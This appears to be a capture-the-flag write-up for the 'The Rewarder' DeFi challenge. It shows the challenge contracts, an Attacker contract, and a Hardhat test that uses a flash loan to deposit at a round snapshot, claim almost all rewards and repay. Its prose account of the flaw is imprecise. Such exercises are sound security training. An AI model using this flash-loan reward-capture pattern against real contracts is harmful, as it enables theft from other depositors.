The Rewarder
AccountingToken.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol";
import "solady/src/auth/OwnableRoles.sol";
/**
* @title AccountingToken
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
* @notice A limited pseudo-ERC20 token to keep track of deposits and withdrawals
* with snapshotting capabilities.
*/
contract AccountingToken is ERC20Snapshot, OwnableRoles {
uint256 public constant MINTER_ROLE = _ROLE_0;
uint256 public constant SNAPSHOT_ROLE = _ROLE_1;
uint256 public constant BURNER_ROLE = _ROLE_2;
error NotImplemented();
constructor() ERC20("rToken", "rTKN") {
_initializeOwner(msg.sender);
_grantRoles(msg.sender, MINTER_ROLE | SNAPSHOT_ROLE | BURNER_ROLE);
}
function mint(address to, uint256 amount) external onlyRoles(MINTER_ROLE) {
_mint(to, amount);
}
function burn(address from, uint256 amount) external onlyRoles(BURNER_ROLE) {
_burn(from, amount);
}
function snapshot() external onlyRoles(SNAPSHOT_ROLE) returns (uint256) {
return _snapshot();
}
function _transfer(address, address, uint256) internal pure override {
revert NotImplemented();
}
function _approve(address, address, uint256) internal pure override {
revert NotImplemented();
}
}
FlashLoanerPool.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
import "@openzeppelin/contracts/utils/Address.sol";
import "../DamnValuableToken.sol";
/**
* @title FlashLoanerPool
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
* @dev A simple pool to get flashloans of DVT
*/
contract FlashLoanerPool is ReentrancyGuard {
using Address for address;
DamnValuableToken public immutable liquidityToken;
error NotEnoughTokenBalance();
error CallerIsNotContract();
error FlashLoanNotPaidBack();
constructor(address liquidityTokenAddress) {
liquidityToken = DamnValuableToken(liquidityTokenAddress);
}
function flashLoan(uint256 amount) external nonReentrant {
uint256 balanceBefore = liquidityToken.balanceOf(address(this));
if (amount > balanceBefore) {
revert NotEnoughTokenBalance();
}
if (!msg.sender.isContract()) {
revert CallerIsNotContract();
}
liquidityToken.transfer(msg.sender, amount);
msg.sender.functionCall(abi.encodeWithSignature("receiveFlashLoan(uint256)", amount));
if (liquidityToken.balanceOf(address(this)) < balanceBefore) {
revert FlashLoanNotPaidBack();
}
}
}
RewardToken.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "solady/src/auth/OwnableRoles.sol";
/**
* @title RewardToken
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
*/
contract RewardToken is ERC20, OwnableRoles {
uint256 public constant MINTER_ROLE = _ROLE_0;
constructor() ERC20("Reward Token", "RWT") {
_initializeOwner(msg.sender);
_grantRoles(msg.sender, MINTER_ROLE);
}
function mint(address to, uint256 amount) external onlyRoles(MINTER_ROLE) {
_mint(to, amount);
}
}
TheRewarderPool.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "solady/src/utils/FixedPointMathLib.sol";
import "solady/src/utils/SafeTransferLib.sol";
import { RewardToken } from "./RewardToken.sol";
import { AccountingToken } from "./AccountingToken.sol";
/**
* @title TheRewarderPool
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
*/
contract TheRewarderPool {
using FixedPointMathLib for uint256;
// Minimum duration of each round of rewards in seconds
uint256 private constant REWARDS_ROUND_MIN_DURATION = 5 days;
uint256 public constant REWARDS = 100 ether;
// Token deposited into the pool by users
address public immutable liquidityToken;
// Token used for internal accounting and snapshots
// Pegged 1:1 with the liquidity token
AccountingToken public immutable accountingToken;
// Token in which rewards are issued
RewardToken public immutable rewardToken;
uint128 public lastSnapshotIdForRewards;
uint64 public lastRecordedSnapshotTimestamp;
uint64 public roundNumber; // Track number of rounds
mapping(address => uint64) public lastRewardTimestamps;
error InvalidDepositAmount();
constructor(address _token) {
// Assuming all tokens have 18 decimals
liquidityToken = _token;
accountingToken = new AccountingToken();
rewardToken = new RewardToken();
_recordSnapshot();
}
/**
* @notice Deposit `amount` liquidity tokens into the pool, minting accounting tokens in exchange.
* Also distributes rewards if available.
* @param amount amount of tokens to be deposited
*/
function deposit(uint256 amount) external {
if (amount == 0) {
revert InvalidDepositAmount();
}
accountingToken.mint(msg.sender, amount);
distributeRewards();
SafeTransferLib.safeTransferFrom(
liquidityToken,
msg.sender,
address(this),
amount
);
}
function withdraw(uint256 amount) external {
accountingToken.burn(msg.sender, amount);
SafeTransferLib.safeTransfer(liquidityToken, msg.sender, amount);
}
function distributeRewards() public returns (uint256 rewards) {
if (isNewRewardsRound()) {
_recordSnapshot();
}
uint256 totalDeposits = accountingToken.totalSupplyAt(lastSnapshotIdForRewards);
uint256 amountDeposited = accountingToken.balanceOfAt(msg.sender, lastSnapshotIdForRewards);
if (amountDeposited > 0 && totalDeposits > 0) {
rewards = amountDeposited.mulDiv(REWARDS, totalDeposits);
if (rewards > 0 && !_hasRetrievedReward(msg.sender)) {
rewardToken.mint(msg.sender, rewards);
lastRewardTimestamps[msg.sender] = uint64(block.timestamp);
}
}
}
function _recordSnapshot() private {
lastSnapshotIdForRewards = uint128(accountingToken.snapshot());
lastRecordedSnapshotTimestamp = uint64(block.timestamp);
unchecked {
++roundNumber;
}
}
function _hasRetrievedReward(address account) private view returns (bool) {
return (
lastRewardTimestamps[account] >= lastRecordedSnapshotTimestamp
&& lastRewardTimestamps[account] <= lastRecordedSnapshotTimestamp + REWARDS_ROUND_MIN_DURATION
);
}
function isNewRewardsRound() public view returns (bool) {
return block.timestamp >= lastRecordedSnapshotTimestamp + REWARDS_ROUND_MIN_DURATION;
}
}
Goal
Claim most of the rewards (RWT token) for ourselves.
Exploit
In order to finish this CTF we will have to use another smart contract. We can name this contract Attacker.
The vulnerable part of the code is located in the TheRewarderPool contract
rewards = amountDeposited.mulDiv(REWARDS, totalDeposits);
the part were the rewards are calculated. To be able to spread the rewards equally we need to store the number of accounts that should receive awards, but this is not taken into account.
To exploit the reward pool we need to:
- create Attacker contract, this contract will be borrowing the flash loan from the FlashLoanerPool, and need to have instances of of the FlashLoanerPool, TheRewarderPool and the DamnValuableToken contracts
-
create receiveFlashLoan(uint amount) external function, this will be the callback function that will be called when receiving the flash loan from FlashLoanerPool, inside this function we will:
- approve the TheRewarderPool to use the flash loan
- deposit the borrowed DVT tokens to the TheRewarderPool in order to be able to receive rewards
- withdraw the deposited DVT tokens from the TheRewarderPool
- return the loan to the FlashLoanerPool, transfer the DVT tokens to the flash loaner pool contract
-
create attack(uint amount, address rewardToken) external function, inside this function we will execute the flash loan (call flashLoan function from the FlashLoanerPool contract), and after that transfer the reward tokens (RWT) to our EOA
- wait for a new round to come, await ethers.provider.send("evm_increaseTime", [5 * 24 * 60 * 60]); // 5 days
- create instance of the Attacker contract
- call the attack function on the Attacker contract
Attacker contract code
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "./FlashLoanerPool.sol";
import "./TheRewarderPool.sol";
import "../DamnValuableToken.sol";
contract Attacker {
FlashLoanerPool private immutable pool;
TheRewarderPool private immutable rewarder;
DamnValuableToken private immutable liquidityToken;
constructor(FlashLoanerPool _pool, TheRewarderPool _rewarder, DamnValuableToken _liquidityToken) {
pool = FlashLoanerPool(_pool);
rewarder = TheRewarderPool(_rewarder);
liquidityToken = DamnValuableToken(_liquidityToken);
}
function receiveFlashLoan(uint256 amount) external {
liquidityToken.approve(address(rewarder), amount);
rewarder.deposit(amount);
rewarder.withdraw(amount);
liquidityToken.transfer(address(pool), amount);
}
function attack(uint256 amount, address rewardToken) external {
pool.flashLoan(amount);
IERC20(rewardToken).transfer(msg.sender, IERC20(rewardToken).balanceOf(address(this)));
}
}
Solution code
const { ethers } = require('hardhat');
const { expect } = require('chai');
describe('[Challenge] The rewarder', function () {
const TOKENS_IN_LENDER_POOL = 1000000n * 10n ** 18n; // 1 million tokens
let users, deployer, alice, bob, charlie, david, player;
let liquidityToken, flashLoanPool, rewarderPool, rewardToken, accountingToken;
before(async function () {
/** SETUP SCENARIO - NO NEED TO CHANGE ANYTHING HERE */
[deployer, alice, bob, charlie, david, player] = await ethers.getSigners();
users = [alice, bob, charlie, david];
const FlashLoanerPoolFactory = await ethers.getContractFactory('FlashLoanerPool', deployer);
const TheRewarderPoolFactory = await ethers.getContractFactory('TheRewarderPool', deployer);
const DamnValuableTokenFactory = await ethers.getContractFactory('DamnValuableToken', deployer);
const RewardTokenFactory = await ethers.getContractFactory('RewardToken', deployer);
const AccountingTokenFactory = await ethers.getContractFactory('AccountingToken', deployer);
liquidityToken = await DamnValuableTokenFactory.deploy();
flashLoanPool = await FlashLoanerPoolFactory.deploy(liquidityToken.address);
// Set initial token balance of the pool offering flash loans
await liquidityToken.transfer(flashLoanPool.address, TOKENS_IN_LENDER_POOL);
rewarderPool = await TheRewarderPoolFactory.deploy(liquidityToken.address);
rewardToken = RewardTokenFactory.attach(await rewarderPool.rewardToken());
accountingToken = AccountingTokenFactory.attach(await rewarderPool.accountingToken());
// Check roles in accounting token
expect(await accountingToken.owner()).to.eq(rewarderPool.address);
const minterRole = await accountingToken.MINTER_ROLE();
const snapshotRole = await accountingToken.SNAPSHOT_ROLE();
const burnerRole = await accountingToken.BURNER_ROLE();
expect(await accountingToken.hasAllRoles(rewarderPool.address, minterRole | snapshotRole | burnerRole)).to.be.true;
// Alice, Bob, Charlie and David deposit tokens
let depositAmount = 100n * 10n ** 18n;
for (let i = 0; i < users.length; i++) {
await liquidityToken.transfer(users[i].address, depositAmount);
await liquidityToken.connect(users[i]).approve(rewarderPool.address, depositAmount);
await rewarderPool.connect(users[i]).deposit(depositAmount);
expect(
await accountingToken.balanceOf(users[i].address)
).to.be.eq(depositAmount);
}
expect(await accountingToken.totalSupply()).to.be.eq(depositAmount * BigInt(users.length));
expect(await rewardToken.totalSupply()).to.be.eq(0);
// Advance time 5 days so that depositors can get rewards
await ethers.provider.send("evm_increaseTime", [5 * 24 * 60 * 60]); // 5 days
// Each depositor gets reward tokens
let rewardsInRound = await rewarderPool.REWARDS();
for (let i = 0; i < users.length; i++) {
await rewarderPool.connect(users[i]).distributeRewards();
expect(
await rewardToken.balanceOf(users[i].address)
).to.be.eq(rewardsInRound.div(users.length));
}
expect(await rewardToken.totalSupply()).to.be.eq(rewardsInRound);
// Player starts with zero DVT tokens in balance
expect(await liquidityToken.balanceOf(player.address)).to.eq(0);
// Two rounds must have occurred so far
expect(await rewarderPool.roundNumber()).to.be.eq(2);
});
it('Execution', async function () {
/** CODE YOUR SOLUTION HERE */
await ethers.provider.send("evm_increaseTime", [5 * 24 * 60 * 60]); // 5 days
const RewarderAttackerFactory = await ethers.getContractFactory('Attacker', player);
rewarderAttacker = await RewarderAttackerFactory.deploy(
flashLoanPool.address,
rewarderPool.address,
liquidityToken.address
);
const tx = await rewarderAttacker.connect(player).attack(
TOKENS_IN_LENDER_POOL,
rewardToken.address
);
await tx.wait();
});
after(async function () {
/** SUCCESS CONDITIONS - NO NEED TO CHANGE ANYTHING HERE */
// Only one round must have taken place
expect(
await rewarderPool.roundNumber()
).to.be.eq(3);
// Users should get neglegible rewards this round
for (let i = 0; i < users.length; i++) {
await rewarderPool.connect(users[i]).distributeRewards();
const userRewards = await rewardToken.balanceOf(users[i].address);
const delta = userRewards.sub((await rewarderPool.REWARDS()).div(users.length));
expect(delta).to.be.lt(10n ** 16n)
}
// Rewards must have been issued to the player account
expect(await rewardToken.totalSupply()).to.be.gt(await rewarderPool.REWARDS());
const playerRewards = await rewardToken.balanceOf(player.address);
expect(playerRewards).to.be.gt(0);
// The amount of rewards earned should be close to total available amount
const delta = (await rewarderPool.REWARDS()).sub(playerRewards);
expect(delta).to.be.lt(10n ** 17n);
// Balance of DVT tokens in player and lending pool hasn't changed
expect(await liquidityToken.balanceOf(player.address)).to.eq(0);
expect(
await liquidityToken.balanceOf(flashLoanPool.address)
).to.eq(TOKENS_IN_LENDER_POOL);
});
});